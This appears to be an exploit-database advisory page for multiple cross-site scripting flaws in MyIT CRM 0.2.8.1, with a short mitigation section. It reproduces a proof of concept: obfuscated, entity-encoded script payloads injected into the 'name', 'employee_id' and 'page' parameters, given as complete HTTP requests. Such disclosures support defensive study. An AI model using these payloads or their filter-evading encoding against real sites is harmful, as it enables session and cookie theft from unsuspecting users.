header-logo
Suggest Exploit
vendor:
MyIT CRM
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: MyIT CRM
Affected Version From: 0.2.8.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting Vulnerabilities in MyIT CRM

MyIT CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to properly sanitize user-supplied input and implement input validation and output encoding to prevent XSS attacks. It is also recommended to keep the software up to date with the latest security patches and updates.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42140/info

MyIT CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

MyIT CRM 0.2.8.1 is vulnerable; other versions may also be affected. 

Proof of Concept:
http://XXX.XXX.XXX.XXX/index.php?page=employees:main&page_title=View%20Employees
 
* The parameter 'name' in the POST request has been set to:
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(36078)>
POST /?page=employees:main HTTP/1.0
Cookie: PHPSESSID=5460a3d8ab4f72cc624e1a6744f5ecfd
Content-Length: 159
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
name=>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
3x70;%26%23x74;%26%23x3a;alert(36078)>&submit=Search
* The parameter 'employee_id' in the GET request has been set to:
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(55255)>
GET             /?page=employees:employee_details&employee_id=>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
3x70;%26%23x74;%26%23x3a;alert(55255)> HTTP/1.0
Cookie: PHPSESSID=4b54d326030a5967e44f5719747a7c86
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Referer: http://demo.myitcrm.com/?page=employees:main
* The parameter 'page' in the POST request has been set to:
>%22%27><img%20src%3d%22javascript:alert(35665)%22>
POST /?page=>%22%27><img%20src%3d%22javascript:alert(35665)%22> HTTP/1.0
Cookie: PHPSESSID=b639ec20245375dcf4b1c3f25dfdf20f
Content-Length: 19
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
name=&submit=Search